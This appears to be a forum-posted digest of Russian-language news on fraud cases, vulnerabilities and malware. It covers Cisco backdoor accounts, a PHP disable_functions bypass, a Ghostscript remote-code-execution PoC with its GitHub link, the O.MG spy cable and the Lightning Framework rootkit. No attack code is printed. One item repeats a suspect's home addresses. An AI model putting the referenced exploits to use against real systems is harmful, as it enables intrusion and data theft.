Опасения касательно квантовой угрозы возобновились в декабре, когда специалисты Google Quantum AI [представили](https://forklog.com/news/v-soobshhestve-otsenili-kvantovuyu- ugrozu-bitkoinu-na-fone-reliza-ot-google) новейший квантовый чип Willow. Он выполнил стандартное эталонное вычисление менее чем за пять минут. Одному из самых быстрых современных суперкомпьютеров Frontier на это требуется 10 септиллионов лет — число значительно превышающее возраст Вселенной.
«Квантовый компьютер взломает биткоин, если мы его не модернизируем. Угроза реальна», — заявил основатель хедж-фонда Capriole Investments Чарльз Эдвардс.
Click to expand...
Напомним, в октябре китайские ученые [осуществили](https://forklog.com/news/uchenye-vzlomali-kriptoalgoritmy-s- pomoshhyu-kvantovogo-kompyutera) «первую в мире эффективную атаку» на широко используемый алгоритм шифрования с применением квантового компьютера.
Позже эксперты [заявили](https://forklog.com/news/eksperty-ugroza-kvantovoj- ataki-na-kriptovalyuty-preuvelichena), что угроза квантовой атаки на криптовалюты преувеличена.
Трое граждан Нигерии нашли способ обмана властей США: на протяжении года они получали коронавирусные пособия по безработице. Схема реализовывалась на протяжении года (с июня 2020-го по июль 2021-го). За это время ими было направлено около 200 заявлений, причем все они были от имени лиц, которые также не имели права на получение помощи от государства.
Заявки содержали ложные сведения, в том числе, например, о том, что заявители работали на определенных работодателей, имели конкретный годовой доход, были самозанятыми, но затем остались без работы либо были уволены с постоянных мест. При этом сами члены группировки нигде никогда официально не числились и не планировали вступать на путь легальных заработков.
Зато на 68 банковских карточек, которыми владели двое из трех членов группировки, от государства поступил без малого миллион долларов. В итоге один из них был приговорен к 26 месяцам заключения, а другой — к 14. Дело третьего соучастника рассматривалось раньше — летом 2023 года он получил четыре года и девять месяцев тюрьмы.
Несмотря на то, что группировка смогла оставаться безнаказанной и незамеченной на протяжении года, говорить, что ее члены отличались умом и сообразительностью, не следует. Абсолютно все 200 заявок, которые поступили от имен разных людей, содержали один и тот же адрес заявителя. И находился по этому адресу реальный дом, в котором втроем жили члены группировки.
source: shorenewsnetwork.com/2023/10/11/two-nigerian-nationals-based-in- maryland-sentenced-for-schemes-to-steal-california-and-other-states- unemployment-insurance-benefits
Следователем СЧ СУ МВД по Республике Коми завершено расследование уголовного дела в отношении ранее не судимого 42-летнего жителя Московской области, обвиняемого в совершении преступлений, предусмотренных ч. 1 ст. 159 УК РФ «Мошенничество» и ч. 2 ст. 159 УК РФ «Мошенничество, совершенное с причинением значительного ущерба гражданину».
Следствием установлено, что фигурант в период с февраля по июнь 2022 года под предлогом продажи автомобильных запчастей похищал деньги у интернет- пользователей. Для этого он создал сайт в сети Интернет. Обратившихся к нему покупателей он вводил в заблуждение относительно наличия товара и просил оплатить покупку полностью. После получения денежных средств злоумышленник переставал отвечать на звонки и входящие сообщения.
Факты преступной деятельности обвиняемого выявлены сотрудниками отдела по раскрытию преступлений в сфере ИТТ УУР МВД по Республике Коми. Установлена причастность фигуранта к 34 эпизодам преступной деятельности. Жертвами афериста стали жители Коми, Самарской, Кировской, Челябинской и Кемеровской областей, а также г. Санкт-Петербурга и Краснодарского края. Причиненный потерпевшим ущерб превысил 380 тысяч рублей.
В настоящее время материалы уголовного дела с утвержденным обвинительным заключением направлены в Раменский городской суд Московской области.
С помощью мулов хозяева доменов реализовали скам-схему “работа на дому”.
18 доменов были конфискованы ФБР и Почтовой инспекционной службой США. На сайтах жертвам предлагалась работа “инспекторов по контролю качества”, которая требовала от них выполнения нескольких задач:
Получение на свой адрес посылок с крадеными товарами и их пересылка на другой
адрес. О том, что товар краденый, жертва не знала;
Покупка некоторых товаров за собственные средства;
Составление фотоотчетов о проделанной работе.
Злоумышленники контролировали “сотрудников” с помощью онлайн-платформы, которую выдавали за систему для совместной работы. Пересылая посылки на нужные адреса, жертвы получали $20 долларов за каждый отправленный товар и становились соучастниками преступлений.
Все раскрылось, когда один из “сотрудников” предоставил ФБР учетные данные от своего аккаунта на платформе мошенников. Там правоохранители обнаружили историю из 25 покупок, сделанных по украденной кредитной карте.
Американские правоохранительные органы расследовали эти подобные скам-схемы с февраля 2021 года, после того как в IC3 (Центр жалоб на интернет-преступления) поступило 64 жалобы на мошенников.
И хотя сайты уже под контролем ФБР, их операторы проживают не в США, поэтому их еще не арестовали. В заявлении Минюста США говорится, что у следователей есть доказательства того, что мошенники базируются в России.
Харьковские киберполицейские совместно с правоохранителями Германии
разоблачили одного из организаторов транснациональной мошеннической группы,
которая нанесла ущерб более 600 тыс. евро. Об этом сообщили в полиции.
Так, 40-летний гражданин Украины совместно с гражданином Молдовы организовали схему мошеннического завладения денежными средствами граждан Евросоюза, в которую привлекли выходцев из стран ЕС и ближнего зарубежья.
Пользуясь доверительным отношением жителей европейских стран к онлайн- покупкам, они, предварительно завладев данными похищенных банковских карт, заказывали в сети товары на сумму в несколько тысяч евро за операцию. Оплачивали товар с помощью карт потерпевших, а в дальнейшем, через специально организованную сеть торговых агентов, сбывали их в восточноевропейских странах.
Транснациональная преступная группа в течение трех лет действовала на
территории ЕС и Украины, за этот период организаторам удалось завладеть
денежными средствами граждан ЕС на сумму более 600 тыс. евро.
В рамках уголовного производства киберполицейскими Харьковской области при
участии членов международной следственно-оперативной группы проведены обыски
по месту жительства фигуранта и изъята техника, с помощью которой совершались
мошеннические действия. Фигурант задержан пограничниками Польши по ордеру на
арест от правоохранительных органов Германии, во время пересечения границы с
Республикой Беларусь. Другой соорганизатор имеет статус обвиняемого в рамках
проведения расследования полицейскими Германии, где находится под стражей.
Хакерский USB-кабель позволяет украсть данные с любого устройства, к которому
он подключен.
На выставке Def Con 2022 в Лас-Вегасе, посвященной информационной безопасности, представили кабель O.MG Elite. Провод внешне ничем не отличается от обычного USB-кабеля для смартфонов, но внутри него прячется «цифровой шпион». Устройство позволяет самостоятельно провести взлом практически любых операционных систем, в том числе Windows, iOS и Android.
Как отмечается, O.MG Elite дает своему обладателю возможность осуществлять перехват нажатия кнопок, инициировать атаки и иные действия с применением консоли, подгружать вредоносное ПО, а также похищать чужие конфиденциальные данные (пароли и т. п.) и передавать их через интернет преступникам. Заявлено, что новинка может хранить одновременно до 650 000 записей о вас.
Хакер рассказал, что создал версии с разъемами Lightning для «айфонов» и наиболее популярные USB-A и USB-C.
Устройство совместимо со всеми актуальными операционными системами для ПК и ноутбуков, в том числе iOS и MacOS. Особенностью гаджета является то, что антивирус не определяет его как опасность. Стоимость гаджета — $180. Разработчик пообещал, что скоро выставит устройства на продажу.
source: theverge.com/23321517/omg-elite-cable-hacker-tool-review-defcon
• Состоялся релиз дистрибутива Kali Linux 2021.4. Для загрузки подготовлены несколько вариантов iso-образов, размером 466 МБ, 3.1 ГБ и 3.7 ГБ.
• Kali включает одну из самых полных подборок инструментов для специалистов в области компьютерной безопасности: от средств для тестирования web-приложений и проникновения в беспроводные сети до программ для считывания данных с идентификационных RFID чипов.
В новом выпуске:
• Samba-клиент перенастроен для обеспечения совместимости с любыми серверами
Samba, независимо от выбранного на сервере варианта протокола, что упрощает
обнаружение уязвимых Samba-серверов в сети. Другими словами, пентестеры теперь
смогут гораздо легче выявить уязвимые серверы Samba «из коробки» и без
необходимости дополнительно конфигурировать Kali.
• Улучшена поддержка систем Apple на базе ARM-чипа M1.
Добавлены новые утилиты:
• Dufflebag
• Maryam
• Name-That-Hash
• Proxmark3
• Reverse Proxy Grapher
• S3Scanner
• Spraykatz
• truffleHog
• Web of trust grapher (wotmate)
• Одновременно подготовлен релиз NetHunter 2021.4, В этом выпуске представлен первый модуль SET: Spear Phishing Email Attack.
• Подробное описание релиза: <https://www.kali.org/blog/kali- linux-2021-4-release/>
В коммутаторах Cisco Catalyst серии PON CGP-ONT-* (Passive Optical Network) [выявлена](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-catpon-multivulns-CE3DSYGr) критическая проблема с безопасностью (CVE-2021-34795), позволяющая при включении протокола telnet подключиться к коммутатору с правами администратора, используя заранее известную отладочную учётную запись, оставленную производителем в прошивке. Проблема проявляется только при активации в настройках возможности доступа через telnet, который отключён по умолчанию.
Кроме наличия учётной записи с заранее известным паролем в рассматриваемых моделях коммутаторов также выявлены две уязвимости (CVE-2021-40112, CVE-2021-40113) в web-интерфейсе, позволяющие неаутентифицированному атакующему, не знающему параметры входа, выполнить свои команды с правами root и внести изменения в настройки. По умолчанию доступ к web-интерфейсу разрешён только из локальной сети, если данное поведение не переопределено в настройках.
Одновременно похожая проблема (CVE-2021-40119) с предопределённым инженерным входом [выявлена](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-cps-static-key-JmS92hNv) в программном продукте Cisco Policy Suite, в котором производилась установка заранее подготовленного производителем SSH- ключа, позволяющего удалённому злоумышленнику получить доступ к системе с правами root.
Опубликован метод обхода в интерпретаторе PHP ограничений, заданных при помощи директивы disable_functions и других настроек в php.ini. Напомним, что директива disable_functions даёт возможность запретить использование в скриптах определённых внутренних функций, например можно запретить "system, exec, passthru, popen, proc_open и shell_exec" для блокирования вызова внешних программ или fopen для запрета открытия файлов.
Примечательно, что в предложенном эксплоите используется уязвимость, о которой разработчикам PHP было сообщено более 10 лет назад, но они посчитали её несущественной проблемой, не влияющей на безопасность. Предложенный метод атаки основан на изменении значений параметров в памяти процесса и работает во всех актуальных выпусках PHP, начиная с PHP 7.0 (атака возможна и на PHP 5.x, но для этого требуется внесения изменений в эксплоит). Эксплоит протестирован в различных конфигурациях Debian, Ubuntu, CentOS и FreeBSD с PHP в форме cli, fpm и модуля для apache2.
В федеральной прокуратуре Восточного округа штата Нью-Йорк сообщили об аресте 46-летнего Давида Мотовича, более чем состоятельного владельца компании лесопильных и строительных материалов Midwood Lumber & Millwork в Бруклине на Кони-Айленд авеню между авеню “H”и “I”.
В тот же день Мотовича доставили в суд, где обвинили в банковском мошенничестве, похищении личных данных и давлении на свидетелей, после чего взяли вод стражу и отправили в бруклинскую федеральную тюрьму MDC без права освобождения под залог. Как утверждает прокуратура, выходец из Израиля с российскими корнями Давид Мотович занимался нелегальным обналичиванием банковских чеков, успев отмыть 55 млн долларов, на которые приобретал недвижимость, ювелирные изделия, дорогие часы, дизайнерскую одежду в магазинах Bloomingdales, Hermes, Neiman Marcus и Saks Fifth Avenue, автомобили Porsche и Lexus, застраховал себя, жену и других на несколько миллионов долларов, отремонтировал квартиру и открывал личные и корпоративные кредитные карты. На розыскном сайте truepeople-search.com указано, что сейчас 46-летний Давид Мотович живет в Манхэттене на Ист 57 стрит, до этого жил в Бруклине на Кони- Айленд авеню, а также в Бэл-Харбор, престижной части Коллинз-авеню в Майами и в Монтиселло – излюбленном ньюйоркцами месте летнего отдыха в «апстейте».
В пресс-релизе ВРИО федерального прокурора Восточного округа Жаклин Косулис
сказано, что Мотовин занимался этим с 2012 года и руководил нелегальным
обналичиванием чеков подрядчиков, которые расплачивались с работниками
наличными, тем самым обманывая налоговые службы государства и штата. За свою
работу Мотовин брал от 4 до 10% комиссионных от стоимости чека, что больше
обычного, но за это не сообщал налоговым службам, как то положено, о
трансакциях на сумму больше 10 тыс. долларов и выдавал своим клиентам
поддельные квитанции о проделанных по подряду работах, чтобы они могли, в
случае, чего показать их налоговым ревизорам. Для успеха предполагаемой
прокуратурой аферы Давид Мотович регистрировал на другие фамилии
компании-«пустышки» и открывал в банках счета, куда с 2012 по 2019 год положил
в общей сложности 55 млн долларов. Как утверждает обвинение, он оказывал
давление на свидетелей, предлагая не сотрудничать с прокуратурой, за что
платил им и их семьям, а также предлагал им отказаться от их адвокатов и взять
защитников по его выбору.
Как положено в подобных делах, следом за федеральным прокурором округа в
пресс-релизе выступили главы участвовавших в расследовании спецслужб. Новый
начальник нью-йоркского отделения ФБР Майкл Дрисколл, который в прошлую
субботу сменил Уильяма Суини, заявил, что «федеральные законы о банках
существуют для защиты этой индустрии от мошенников и широкой публики от
отмывания денег, которое часто следует за преступлениями. Как предполагается,
Мотович нарушал эти законы ради собственных денежных интересов. Хуже того, он
также обвинен в давлении на свидетелей обвинения. Будьте уверены, что ФБР и
наши партнеры будут агрессивно преследовать подобный тип незаконного
поведения». Очевидно, новый начальник, Дрисколл обошелся без метафор и
эпитетов, на которые был горазд Суини.
На следующий день после ареста Мотовича в суде рассматривалась возможность его освобождения под залог в 5 млн долларов недвижимостью, но по протесту прокуратуры судья-магистрат Роанн Манн на это не пошла, а точнее, адвокат подсудимого Джереми Гутман отозвал свое предложение. Прокуратура утверждала, что у Давида Мотовича достаточно денег и связей за рубежом, чтобы скрыться от правосудия. Еще через день адвокат Гутман в письме судье Манн увеличил сумму залога в 15 раз, то есть до 75 млн долларов, обеспеченных недвижимостью Бориса Мотовича (отца Давида) и трех друзей подсудимого. Адвокат пояснил, что предложенная под залог недвижимость Мотовича-старшего стоит больше 50 млн долларов. Еще через день судья Роанн Манн получила письмо прокурора Жаклин Косулис с объяснением позиции обвинения. Там достаточно подробно излагалось, почему арестованного 24 августа Давида Борисовича Мотовича нельзя освобождать ни за какие коврижки, так как у него есть основания, средства и связи, чтобы сбежать, и почему предложенные под залог недвижимости вызывают сомнение своей легитимностью.
Прокурор Косулис написала, что в день ареста Мотовича в его манхэттенской квартире-пентхаусе 45-этажного кооператива на 57 стрит и Второй авеню, в офисе его компании Midwood Lumber в Бруклине и расположенном там же через дорогу офисе обмолачивания чеков (Check Cashing Business) были проведены обыски. В квартире агенты нашли больше 50 тыс. долларов наличными, а в потайной комнате в офисе примерно 153 тыс. долларов, тоже наличными. В обоих помещениях были обнаружены ювелирные изделия на сотни тысяч долларов, а у двери квартиры лежала сумка жены Давила Мотовича, а в ней кредитная карта American Express на другое имя. «Вкупе с другими собранными при расследовании доказательствами, - написала бруклинский федеральный прокурор судье, - это свидетельствует, что обвиняемый пользовался чужими личными данными, чтобы скрывать свое обращение с деньгами на банковских счетах и уходить от расследования его широкомасштабных и сложных афер». Смелый, я бы сказал, вывод, но сердцу прокурора не прикажешь.
О предложенной в залог недвижимости Бориса Мотовича прокурор Косулис написала, что это «три коммерческих здания в Бруклине, зарегистрированных на имя корпорации, 90% которой принадлежат Борису и 10% Давиду. Как утверждает адвокат Гутман, эти здания общей полезной площадью 106 тысяч кв. футов стоят больше 50 млн долларов, но тут есть проблема, так как отец Давида Мотовича лицо заинтересованное. Борис Мотович, написала судье Манн прокурор Косулис, «тесно вовлечен, знаком и заинтересован в незаконные действия обвиняемого», то есть своего сына Давида. Как утверждает обвинение, Борису Мотовичу принадлежат 100% компании пиломатериалов, в которой его сын занимался незаконными операциями обналичивания чеков. «Прокуратура располагает данными, - написала Жаклин Косулис, - что отец обвиняемого направлял ему клиентов на обналичивание, и более того, деньги с банковских счетов компании-пустышки (Shell Company Bank Accounts) шли прямиком отцу обвиняемого в виде выплат по ипотекам, которые он был должен». К тому же «у Бориса Мотовича глубокие личные и финансовые связи с Израилем, что может способствовать ему и обвиняемому (и семье обвиняемого) в побеге». В ноябре 2016 года Давид Мотович с отцом и другими членами семьи летали в Израиль на торжественную церемонию закладки первого камня в фундамент здания Центра еврейского наследия имени Мотовича при неуточенном университете. В четырехэтажном здании Центра, который строился на деньги семьи, находится главная синагога университета, а на церемонии среди почетных гостей был министр обороны Израиля. В деле есть данные, что Давид Мотович регулярно вылетал за рубеж, и с июня 2018 по октябрь 2019 года таких полетов было пять: в Испанию, Израиль (с возвращениям через Дубай), Италию, Амстердам (через Париж) и Лондон.
Примерно также прокурор Жаклин Косулис разобралась с тремя другими гарантами залога за освобождение Давида Мотовича - его друзьями Соломоном Мерчиано, Робертом Изаком и Мордехаем Быстрицким По поводу денег отца и сына Мотович прокурор Косулис написала, что «по прошлогодним данным их бухгалтера, совместный капитал Бориса и Давида составил больше 210 млн долларов, включая почти 4 млн наличными и не считая миллионов долларов, которые тайно прошли через компании-пустышки». Таким образом, заключила она, «предложенная сумма залога составляет ничтожный процент семейных активов обвиняемого», а заявление его адвоката, будто Давид Мотович не сбежит, так как он не сделал этого, уже зная, что идет расследование, ничего не значит. Расследование, пояснила Жаклин Косулис, а особенно перехват разговоров Давида Мотовича, показывает его веру в то, что ему удастся заключить с прокуратурой «денежное соглашение» и избежать уголовных обвинений.
Как во всяком приличном расследовании, в деле Давида Мотовича бруклинской федеральной прокуратуре помогли «CW» (Cooperating Witnesses) – свидетели, сотрудничающие с обвинением. В деле их трое, и все «признали себя виновными и пошли на сотрудничество, надеясь на снисходительный приговор». Ожидается, что эти трое дадут в суде показания против Давида Мотовича, а четвертый свидетель, который пока не «CW», согласился показать, что на его имя, но без его согласия Мотович открыл в компании пустышке банковский счет.
«CW-1» уже рассказал, что минимум с января 2012 по 2019 год получал от Давида Мотовича деньги следующим образом. Мотович инструктировал «CW-1» выписать чеки его компании другим компаниям, названия которых он сообщал, но просил в чеках оставлять незаполненной строчку с названием получателя, так как «либо еще не создал эту компанию-пустышку, либо не решил, какую именно компанию ему использовать». Указанная в чеках сумма никогда не превышала 10 тысяч долларов. За это «CW-1» получал плату наличными, которые Мотович вручал ему в потайной комнате своего офиса бруклинской лесопилки Midwood Lumber & Millwork на Кони- Айленд авеню. Сумма выплаты обычно соответствовала той, что значилась на чеке, минус 4-6% «комиссионных» Мотовичу. Свидетель «CW-2» рассказал и готов повторить присяжным примерно то же самое. «Ознакомившись с банковскими документами, - написал в предварительном обвинении (Сriminal Complaint) следователь федеральной налоговой службы IRS Кристофер Кабане, - я узнал, что с 2012 по 2019 год CW-2 выписал такие чеки на общую сумму больше 1,3 млн долларов»
Помимо показаний свидетелей, вина подсудимого доказывается банковскими и корпоративными документами, сотнями электронных и телефонных сообщений, фотографиями, перехватом разговоров, данными сетевой копилки информации iCloud и другими подручными, но сугубо законными средствами наших федеральных правоохранителей. Такова история «лесопилки», на которой, как утверждает бруклинская федеральная прокуратура, пилили деньги, положенные налоговой службе.
На этой неделе в сети появился PoC-эксплоит для неисправленной уязвимости в Ghostscript. Проблема подвергает опасности все серверы, использующие этот компонент.
Эксплоит был опубликован вьетнамским и ИБ-специалистом, который известен в сети под псевдонимом Nguyen The Duc. Код уже доступен на GitHub, а эффективность эксплоита подтверждена несколькими ведущими исследователями.
__https://twitter.com/x/status/1434567659476197382
Ghostscript, появившийся еще в 1988 году, представляет собой небольшую библиотеку, которая позволяет приложениям обрабатывать документы PDF и файлы на основе PostScript. Хотя в основном Ghostscript применяется в десктопном софте, он также используется и на стороне сервера, так как зачастую включен в наборы инструментов для конвертации изображений и загрузки файлов, к примеру, в ImageMagick.
Представленный на этой неделе эксплоит позволяет злоумышленнику загрузить искаженный файл SVG, который осуществляет побег из обработчика изображений и запускает вредоносный код в базовой ОС.
Интересно, что уязвимость, для которой был создан эксплоит, обнаружил не Nguyen The Duc. Эта заслуга принадлежит техническому директору и основателю компании Wunderfund Эмилю Лернеру (Emil Lerner), который нашел баг еще прошлом году и использовал его для получения вознаграждений от таких компаний, как Airbnb, Dropbox и «Яндекс». Детальная информация об уязвимости стала достоянием общественности в прошлом месяце, после того как Лернер выступил на конференции ZeroNight с докладом.
__https://twitter.com/x/status/1430502815181463559
Издание [The Record](https://therecord.media/ghostscript-zero-day-allows-full- server- compromises/?cf_chl_jschl_tk=pmd_plgtpo5YEsDUz842KCqjlqrO7lDEguHt61GdHFgeXD4-1631186241-0-gqNtZGzNAlCjcnBszQqR) сообщает, что патча для этой уязвимости все еще нет, более того, компания Artifex, стоящая за разработкой Ghostscript, сообщила, что официально об этой проблеме ее никто не уведомлял. В компании заявили, что «все больше разочаровываются в ИБ-исследователях, которые пренебрегают этичным раскрытием потенциально опасных уязвимостей безопасности», и пообещали выпустить исправление в самое ближайшее время.
Источник: https://xakep.ru/2021/09/10/ghostscript-poc/
PoC: https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50
Крайне интересный и уникальный вредоносный фреймворк для Linux обнаружили специалисты Intezer, который из-за своей модульной архитектуры и множества функций сравнили со швейцарским армейским ножом.
Речь идет о вредоносной среде Lightning Framework, которая позволяет злоумышленникам устанавливать руткиты на целевых системах. Причем из-за обилия функций специалисты назвали его одной из самых сложных сред, разработанных для систем Linux.
Фреймворк имеет как пассивные, так и активные возможности для обратной связи с злоумышленником и полиморфную гибкую конфигурацию C2.
О новой малвари для Linux подробно рассказал исследователь Райан Робинсон в своем отчете.
Центральным элементом вредоносной экосистемы является загрузчик kbioset и основной модуль kkdmflush, первый из которых предназначен для загрузки как минимум семи различных подключаемых модулей с удаленного сервера, которые после вызываются основным модулем.
Собственно основной модуль kkdmflush устанавливает связь с C2 для получения команд, необходимых для выполнения плагинов, а также старается скрыть свое присутствие на скомпрометированной машине.
Функционал малвари позволяет снимать отпечатки системы, запускать cmd, загружать файлы на сервер C2, записывать произвольные данные в файл и даже обновлять и удалять себя с зараженного хоста.
Кроме того, создается сценарий инициализации, который выполняется при загрузке системы, что фактически позволяет автоматически запускать загрузчик.
Пока фактов использования в дикой природе доподлинно не установлено, однако специалистов напрягает тот факт, что появление Lightning Framework делает его уже пятым штаммом вредоносного ПО для Linux, обнаруженным за последние три месяца после BPFDoor, Symbiote, Syslogk и OrBit.
• Source: <https://www.intezer.com/blog/research/lightning-framework-new- linux-threat/>
МОСКВА, 21 июня. /ТАСС/. Россия нуждается примерно в 170 тыс. IT-специалистах, нехватка которых возникла после отъезда айтишников из страны из-за санкций. Об этом сообщил во вторник статс-секретарь - заместитель главы МВД РФ Игорь Зубов.
"У нас большой отток IT-специалистов в связи с санкциями, потребность примерно 170 тыс. человек. В отрасли занят миллион человек", - сказал он в ходе работы комитета в Совете Федерации.
Зубов напомнил, что в настоящее время IT-компаниям предоставлены существенные преференции в области налогов, в том числе, других обязательных платежей. При этом, по его словам, есть и ряд требований, когда IT-организации должны 90% своей деятельности осуществлять в этой области. Сколько специалистов приедут в Россию трудиться, будет зависеть от привлекательности "нашей с вами сегодняшней меры". "Предполагается, что средняя зарплата у них будет примерно 140 тыс.", - добавил замглавы МВД.
Госдума на пленарном заседании 15 июня приняла в третьем окончательном чтении правительственный законопроект, позволяющий получить иностранным IT- специалистам вид на жительство (ВНЖ) по упрощенной процедуре. Согласно общему правилу, для получения вида на жительство иностранный гражданин обязан прожить не менее одного года по разрешению на временное проживание, которое выдается в пределах ежегодно утверждаемой кабмином квоты. Тем не менее, отдельные категории граждан, которые имеют особые компетенции и высокую квалификацию, могут получить ВНЖ по упрощенной процедуре: минуя получение разрешения на временное проживание. Эта мера будет распространена и на IT-специалистов. Вместе с ними ВНЖ смогут получить их супруги, дети (в том числе приемные), супруги детей, бабушки, дедушки, внуки.
I will not be translating this so I wish that this is easy to understand in any language but I hate google translate as it is.
To finish on a strong note this week has been very interesting with the war, marketplaces being hacked & Malware evolving with owners being identified or groups rebranding. This is just a summery of this week more or less with some opinions and speculations included. I Figured I'd sum it of for everyone. I Included some political, technological, Malware, and dark web news.
Эксперты идентифицировали 38 C&C-серверов Cyclops Blink, и 22 из них находились в США.
Второй раз в нынешнем году ФБР воспользовалось ордером на обыск и арест имущества с целью очистки от вредоносного ПО устройств, принадлежащих частным компаниям и пользователям без их непосредственного одобрения. Бюро воспользовалось ордером на обыск и арест, чтобы отключить ботнет Cyclops Blink, предположительно управлявшийся APT-группой Sandworm.
Cyclops Blink представляет собой модульное вредоносное ПО, предназначенное для заражения и управления сетевыми устройствами, такими как маршрутизаторы и межсетевые экраны. Одной из главных целей вредоноса являлись межсетевые устройства WatchGuard Firebox. Кроме того, он атаковал маршрутизаторы производства ASUS.
ФБР удалось восстановить образ прошивки одного из скомпрометированных устройств WatchGuard с разрешения его владельца и благодаря этому изучить вредонос. Эксперты также осуществляли мониторинг трафика зараженного устройства, что позволило им идентифицировать один из релейных C&C-серверов на территории США.
Получив доступ к серверу и проанализировав его работу, специалисты установили, что C&C-серверы Cyclops Blink использовали цифровые сертификаты с определенными характеристиками. Просканировав интернет в поисках этих характеристик, они смогли идентифицировать 38 C&C-серверов, и 22 из них находились в США. С помощью ордеров на обыск и арест имущества ФБР получило контроль над некоторыми серверами.
Специалисты разработали особую технику, позволившую им подделать панель управления серверами в сети Tor и отправлять команды подконтрольным им ботам. Совместно с WatchGuard и другими правоохранительными органами ФБР разработало стратегию по очистке зараженных устройств, в соответствии с которой им отправлялась серия команд.
Эти команды были нужны для достижения следующих целей: подтверждения наличия на зараженном устройстве вредоносного кода, регистрации серийного номера зараженного устройства, извлечения копии вредоносного ПО и списка вшитых C&C-серверов, удаления вредоносного кода и добавления правила межсетевого экрана, блокирующего удаленный доступ к интерфейсу управления.
Такую же стратегию ФБР использовало в апреле прошлого года для копирования и последующего удаления web-оболочек с серверов Microsoft Exchange, использовавшихся китайской кибершпионской группировкой Hafnium.
source: justice[.]gov/opa/press-release/file/1491281/download
Парижская организация Cybersecurity Advisors Network (CyAN), представляющая интересы специалистов в области информационной безопасности, создала новую рабочую группу, которая ищет законные основания для отклонения исков от поставщиков ПО из-за обнаружения уязвимостей нулевого дня.
Как рассказал руководитель нового проекта Zero Day Legislative Project Питера Коронеоса (Peter Coroneos) изданию The Register, организация провела виртуальную встречу с более чем 150 исследователями в области кибербезопасности, и тема агрессивных юридических мер реагирования на разглашение информации об уязвимостях была в их списке проблем.
«Обычно они находят уязвимость, а затем уведомляют поставщика. И в этот момент они получают письмо с угрозами. Угрозы обычно связаны с авторским правом и/или уголовным законодательством, регулирующим доступ или вмешательство в компьютерные системы», — пояснил Коронеос.
Поставщики обычно приветствуют данные подходы исследователей, и многие из них теперь используют программы вознаграждения за обнаружение уязвимостей или формальные инициативы по раскрытию информации, гарантируя обработку уведомлений об уязвимостях с надлежащей скоростью. Поэтому Коронеос был удивлен тем, что проблема судебных исков по-прежнему возникает у ИБ-экспертов.
«Вот почему мы создаем международную коалицию, которая будет выступать за внесение изменений в законы, гарантирующих искателям 0Day-уязвимостей защиту от жестких юридических ответных мер со стороны компаний, продукты которых они стремятся обезопасить», — сообщил эксперт.
Проект будет работать над определением типовых законов, защищающих исследователей угроз, а затем побуждать участников по всему миру лоббировать их введение в различных юрисдикциях.
• Source: https://www.theregister.com/2021/10/11/cyan_zero_day_legislative_project/
Магазин OpenAI GPT: меняет правила игры для энтузиастов искусственного интеллекта
OpenAI только что запустила нечто действительно революционное: GPT Store. Этот онлайн-рынок позволяет любому создавать, обмениваться и находить собственные модели GPT, также известные как большие языковые модели. Это значительный шаг вперед в обеспечении доступности и демократизации ИИ, и он может революционизировать то, как мы взаимодействуем с технологиями ИИ и используем их.
Что такое магазин GPT?
GPT Store — это, по сути, магазин приложений для моделей искусственного интеллекта. Вы можете просмотреть множество предварительно обученных моделей, каждая из которых обладает своими уникальными возможностями и специализацией. Некоторые модели предназначены для конкретных задач, например для написания различных видов творческого контента, тогда как другие имеют более общий характер. Вы даже можете опробовать модели перед их покупкой, чтобы убедиться, что они соответствуют вашим потребностям.
Каковы преимущества магазина GPT?
Магазин GPT предлагает ряд преимуществ как частным лицам, так и предприятиям. Для частных лиц это дает возможность легко получить доступ к мощной технологии искусственного интеллекта и поэкспериментировать с ней. Вы можете использовать магазин, чтобы найти модели, которые помогут вам в написании творческих работ, программировании или даже исследованиях. Для бизнеса GPT Store может стать ценным инструментом для разработки индивидуальных решений искусственного интеллекта. Вы можете использовать магазин для поиска моделей, предварительно обученных на определенных наборах данных или предназначенных для конкретных задач.
Каковы потенциальные проблемы?
Как и в случае с любой новой технологией, с GPT Store связаны некоторые потенциальные проблемы. Одна из проблем заключается в том, что магазин может быть использован для распространения вредоносных или предвзятых моделей ИИ. OpenAI предпринимает шаги для решения этой проблемы, внедряя процесс проверки всех моделей, представленных в магазине. Еще одна проблема заключается в том, что магазин может привести к распространению некачественных моделей ИИ. OpenAI также работает над решением этой проблемы, предоставляя рекомендации для создателей моделей и выделяя высококачественные модели в магазине.

gpt-store)
We’re launching the GPT Store to help you find useful and popular custom versions of ChatGPT.
openai.com
Пенсионерка из Кирова стала жертвой мошенников, позвонивших ей из «Канады». Злоумышленники обманом похитили у 72-летней женщины более 2 млн рублей.
Пенсионерка получила звонок от неизвестного, представившегося специалистом финансовой безопасности Центрального банка РФ. При этом входящий номер начинался с телефонного кода Канады. Мошенник заявил, что со счета пенсионерки украдены деньги, однако Центробанку РФ удалось их «спасти» и перевести на счет женщины. От нее потребовали вернуть возвращенные средства, для убедительности отправив в мессенджер фотографию удостоверения фейкового сотрудника банка.
Поверив, пожилая кировчанка несколько дней ходила в разные банки и переводила деньги на указанные ей номера карт, часть денег была оформлена ею в кредит. По факту мошенничества в особо крупном размере возбуждено уголовное дело.
На пользователя соцсети заведено уголовное дело за лайк под постом.
Районный суд города Майнинген в Германии постановил, что простой лайк может быть уголовным преступлением. В частности, если понравившийся пост имеет криминальное содержание.
В пример приводится случай, когда охотник и браконьер убили двух полицейских во время осмотра автомобиля подсудимых. В соцсетях пользователи были шокированы новостью, но один из пользователей написал в своем посте «ни секунды молчания для этих существ».
Один пользователь лайкнул этот пост, и этот лайк стал уголовным преступлением. По словам [адвоката подсудимого](https://www.ekh- legal.de/blog/strafrecht/landgericht-meiningen-liken-kann-strafbar-sein/) Эхсана Хазаэли, пользователь Facebook «наказал себя как за очернение памяти умершего в соответствии с §189 StGB, так и за одобрение уголовных преступлений в соответствии с §140 StGB». На данный момент не известно, ведется ли следствие над пользователем и вынесен ли приговор.
В отношении человека, который нажал кнопку «Мне нравится», был проведен обыск,
и власти получили доступ к квартире, автомобилю и облачному хранилищу
подозреваемого.
Хазаэли раскритиковал это решение и заявил, что лайк не отменяет факт того,
что пост чужой. Более того, автор лайка не может присвоить этот пост и сделать
его «своим».
Лайк — это не «результат интеллектуальной деятельности», и уж точно не одобрение преступления. Пост связан с трауром и отпеванием двух полицейских, а не с убийством как таковым. Это можно и нужно считать бессмысленным, но с точки зрения уголовного права это не имеет значения
